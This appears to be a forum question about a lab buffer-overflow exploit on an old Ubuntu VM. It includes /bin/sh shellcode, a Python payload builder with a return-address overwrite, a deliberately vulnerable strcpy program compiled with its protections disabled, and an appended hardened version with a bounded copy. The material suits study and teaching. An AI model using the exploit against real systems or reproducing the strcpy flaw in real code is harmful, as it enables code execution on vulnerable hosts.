Shellcode: https://www.exploit-db.com/raw/42179
Exploit code (Python):
sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)
Vulnerable code (C):
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char buffer[100];
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    printf("buffer is here: %p\n", &buffer);
    strcpy(buffer, argv[1]);
    printf("copied %s into buffer\n", argv[1]);
    return 0;
}
The VM I'm using is: ubuntu-9.04-server-amd64 (2.6.28-11).
How I compile the vulnerable code:
gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln
The problem I seem to be running into is that I can't figure out how to get the rip register to go to the correct return address.
Output:
...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()
Can someone help?
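For contrast with the vulnerable program in the question, here is the same program with the unbounded strcpy() replaced by a length-checked copy. This is an added example, not code from the question or from the exploit-db entry; copy_bounded() and run() are hypothetical names chosen for the illustration. The point is the defect the question relies on: strcpy() into a fixed 100-byte stack buffer copies whatever length argv[1] has, which is what lets the saved return address be overwritten, and a copy that refuses input longer than the buffer removes that write entirely (independent of -fno-stack-protector and -z execstack, which only remove mitigations around the bug).

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>

/* Added example (not from the original post). Hardened counterpart of the
 * question's vuln.c: the destination size is passed explicitly and checked
 * before any byte is written, so an over-long argv[1] is rejected instead
 * of overwriting the saved frame pointer and return address. */

#define BUF_SIZE 100   /* same buffer size as the vulnerable program */

/* Copies src into dst (capacity dst_size) only if it fits together with its
 * NUL terminator. Returns true on success; on failure nothing past dst[0]
 * is touched and dst is left as an empty string. The scan stops at dst_size
 * bytes, so an unterminated src cannot run the scan off the end either. */
bool copy_bounded(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0)
        return false;
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n == dst_size) {       /* no room for the terminator: refuse */
        dst[0] = '\0';
        return false;
    }
    memcpy(dst, src, n + 1);   /* n bytes of text plus the NUL */
    return true;
}

/* Mirrors the body of the question's main() with the checked copy.
 * Returns the process exit status instead of calling exit() so it can be
 * exercised directly. */
int run(const char *arg) {
    char buffer[BUF_SIZE];
    if (!copy_bounded(buffer, sizeof buffer, arg)) {
        fprintf(stderr, "input too long (%zu bytes, max %zu)\n",
                strlen(arg), sizeof buffer - 1);
        return EXIT_FAILURE;
    }
    printf("copied %s into buffer\n", buffer);
    return EXIT_SUCCESS;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        return EXIT_FAILURE;
    }
    return run(argv[1]);
}
```

Compiled with the same gcc line as the question (minus the mitigation-disabling flags, which are no longer needed to make the point), a 120-byte argument is rejected with "input too long" rather than producing the SIGSEGV shown in the output above, because the 21 bytes that previously spilled past buffer[100] are never written.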